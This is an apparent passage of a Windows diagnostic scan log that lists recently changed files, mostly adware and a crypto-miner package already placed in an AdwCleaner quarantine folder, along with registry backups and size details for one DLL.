         -1.4s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.2s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.2s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.8s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.7s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.7s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.6s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.6s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.5s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.5s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.5s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.4s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.3s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
         -0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.4s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.5s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.5s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.5s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.5s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.6s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.6s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.6s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.6s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.7s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.7s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.7s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.7s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.8s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.8s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          0.8s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          0.8s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          0.9s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          0.9s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          0.9s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          0.9s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.0s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.0s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.0s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.0s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.3s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.4s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.4s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.4s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          6.9s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.4s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.6s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.4s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
      Size . . . . . . . : 358.912 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
